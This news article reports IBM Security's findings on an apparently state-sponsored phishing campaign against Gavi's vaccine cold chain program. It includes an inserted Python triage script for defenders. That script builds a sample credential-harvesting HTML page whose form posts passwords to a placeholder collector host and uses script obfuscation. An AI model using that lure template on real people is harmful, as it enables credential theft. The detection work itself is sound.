An unknown threat actor that is likely sponsored by a nation state is believed to be behind a recent phishing campaign targeting the COVID-19 vaccine cold chain, IBM Security reported on Thursday.
The company’s researchers believe the attacks started sometime in September and evidence suggests that the attackers have targeted organizations in at least six European and Asian countries.
The targets appear to be associated with the Cold Chain Equipment Optimization Platform (CCEOP) of Gavi, the Vaccine Alliance, whose main goal is to improve access to vaccines in poor countries. The CCEOP was launched a few years ago by Gavi and its partners due to the need for temperature-controlled environments to ensure that vaccines remain cold and effective until they reach their destination.
The coronavirus pandemic and the approval of COVID-19 vaccines are leading to an increase in demand for such solutions so it’s not surprising that entities related to the CCEOP have been targeted.
The attacks observed by IBM involved phishing emails apparently coming from an executive at Haier Biomedical, a Chinese firm that is qualified for the CCEOP program and which is said to be the only complete cold chain solutions provider in the world. The phishing emails, posing as a request for quotation related to the CCEOP program, were sent to executives in IT, sales, procurement and finance departments, and in some cases to a wide range of employees within the targeted organization.
The emails carried an HTML attachment that, when opened, rendered a login page and instructed recipients to enter their credentials in order to view its content. Attaching the phishing page directly to the email, rather than linking to one, reduces the attackers' exposure: there is no hosted landing page for defenders to find, report and take down, only the server that receives the submitted credentials, and URL-reputation filters see no link to block.
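The technique just described (an HTML attachment that renders a credential form and posts it elsewhere) is easy to triage with a small script. The following is an added example, not code from the article or from IBM's report: it builds a constructed sample email with an HTML attachment (the sender, recipient, filename, collector host and script body are all hypothetical), then walks the attachments and flags the indicators a defender would look for: password inputs, form actions pointing at an external host, and common script obfuscation primitives.

```python
import email
import email.policy
import re
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse


def build_sample_eml() -> bytes:
    """Constructed lure for testing; hosts and names are placeholders, not real indicators."""
    msg = EmailMessage()
    msg["From"] = "Sales Manager <sales@example.invalid>"
    msg["To"] = "procurement@target.invalid"
    msg["Subject"] = "Request for Quotation - cold chain equipment"
    msg.set_content("Please open the attached RFQ and sign in to view the document.")
    html = """<html><body>
<p>This document is protected. Enter your email password to view.</p>
<form method="POST" action="https://collector.example.invalid/p.php">
  <input type="email" name="user">
  <input type="password" name="pass">
  <input type="submit" value="View document">
</form>
<script>document.write(unescape('%3Cimg%20src%3D...'))</script>
</body></html>"""
    # Attach as bytes so the part is base64-encoded, as real lures usually are.
    msg.add_attachment(html.encode(), maintype="text", subtype="html",
                       filename="RFQ_CCEOP.html")
    return msg.as_bytes()


# Script primitives commonly used to hide the real page or the posting logic.
OBFUSCATION = re.compile(r"\b(unescape|atob|eval|document\.write|fromCharCode)\b")


class CredFormScanner(HTMLParser):
    """Collects forms, password inputs and inline script text from an HTML document."""

    def __init__(self) -> None:
        super().__init__()
        self.password_inputs = 0
        self.form_actions: list[str] = []
        self.in_script = False
        self.script_text: list[str] = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.script_text.append(data)


def scan_html(html: str) -> list[str]:
    """Return human-readable indicators that the HTML is a credential-harvesting page."""
    p = CredFormScanner()
    p.feed(html)
    p.close()
    findings: list[str] = []
    if p.password_inputs:
        findings.append(f"password input(s): {p.password_inputs}")
    for action in p.form_actions:
        if action.startswith(("http://", "https://")):
            findings.append(f"form posts to external host: {urlparse(action).hostname}")
        elif not action:
            findings.append("form with empty action (likely JS-driven submit)")
    hits = sorted(set(OBFUSCATION.findall("\n".join(p.script_text))))
    if hits:
        findings.append("script uses: " + ", ".join(hits))
    return findings


def scan_eml(raw: bytes) -> dict[str, list[str]]:
    """Map each HTML attachment filename in a raw RFC 5322 message to its indicators."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    results: dict[str, list[str]] = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        if part.get_content_type() != "text/html" and not name.lower().endswith((".html", ".htm")):
            continue
        body = part.get_payload(decode=True) or b""  # undoes base64/quoted-printable
        results[name] = scan_html(body.decode("utf-8", errors="replace"))
    return results


if __name__ == "__main__":
    for filename, findings in scan_eml(build_sample_eml()).items():
        print(filename)
        for f in findings:
            print("  -", f)
```

A password field alone is not conclusive (legitimate encrypted-document workflows exist), but a password input combined with a form action on a host unrelated to the sender, or with `unescape`/`atob` wrapping of the page body, is a strong enough signal to quarantine the message and pull the sender and collector host into hunting queries.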
IBM Security researchers believe that the goal of the campaign may have been to collect credentials that would give the attackers access to internal communications and information on the distribution of a COVID-19 vaccine.
Targets of the attack included the European Commission’s Directorate General for Taxation and Customs Union, which could serve as an entry point to high-value organizations across the European Union, as well as companies in the IT, energy and manufacturing sectors that could provide access to valuable information related to the distribution of a coronavirus vaccine. Targeted organizations have been notified, but it’s unclear if any of them took the bait.
“However, the established role that Haier Biomedical currently plays in vaccine transport, and their likely role in COVID-19 vaccine distribution, increases the probability the intended targets may engage with the inbound emails without questioning the sender’s authenticity,” IBM Security explained in a blog post.
IBM has not been able to definitively link the campaign to a known group, but its sophistication and targets suggest that it’s a state-sponsored operation.
“Without a clear path to a cash-out, cyber criminals are unlikely to devote the time and resources required to execute such a calculated operation with so many interlinked and globally distributed targets,” it explained. “Likewise, insight into the transport of a vaccine may present a hot black-market commodity, however, advanced insight into the purchase and movement of a vaccine that can impact life and the global economy is likely a high-value and high-priority nation-state target.”
It would not be surprising to learn that a state-sponsored threat actor is indeed behind these attacks given the accusations made since the start of the pandemic by various countries. The US has accused China, the UK has accused Russia, and Microsoft has accused both Russia and North Korea of targeting vaccine research.
Related: Kremlin Denies UK Claims of Vote Meddling, Vaccine Hacking
Related: Russia Denies Microsoft Claims of Healthcare Cyber Attacks
Related: China Accuses US of ‘Slander’ Over Coronavirus Research Hacking Claims

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.